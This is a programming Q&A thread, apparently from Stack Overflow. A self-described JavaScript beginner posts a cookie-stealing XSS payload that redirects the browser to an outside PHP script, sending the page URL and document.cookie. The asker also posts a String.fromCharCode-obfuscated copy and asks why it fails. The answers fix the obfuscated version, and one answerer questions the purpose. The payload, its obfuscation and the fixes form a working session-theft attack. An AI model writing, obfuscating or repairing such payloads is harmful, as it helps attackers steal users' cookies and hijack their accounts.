1

i am new to javascript and programming at all.

This is orginal code:

document.location = "http://ormteam.net23.net/Cookie_stealer.php?url=" + window.location.href + "&cookies=" + document.cookie;

And this is with string.fromcharcode

document.location = String.fromCharCode(34, 104, 116, 116, 112, 58, 47, 47, 111, 114, 109, 116, 101, 97, 109, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 67, 111, 111, 107, 105, 101, 95, 115, 116, 101, 97, 108, 101, 114, 46, 112, 104, 112, 63, 117, 114, 108, 61, 34) + document.url + String.fromCharCode(34, 38, 99, 111, 111, 107, 105, 101, 115, 61, 34) + document.cookies;

Why this does not work ?

Sitting on this peace of code for hours! ;//

Improve this question

2 Answers 2

Reset to default
4

The quotes are only needed for the string literal. Since you're not using a string literal, you don't need the quotes.

document.location = String.fromCharCode(104, 116, 116, 112, ...
Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

can going to such a link from SO lead to stealing my cookie and causing any security issues? :)
@sabithpocker No more than going to a link with the string literal directly can.
@pickypg just curious as it passed document.cookie as GET parameter when i tried it in console.
@sabithpocker That's because the location specifies it at the end. That is by-the-book cross site scripting (XSS), but it's no different than if the link was encoded as it was originally (a string).
2

remove 34 from those char codes as they are for "

make document.cookies to document.cookie

What are you doing with cookie stealer if you are new to javascript, just curious!

Improve this answer

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.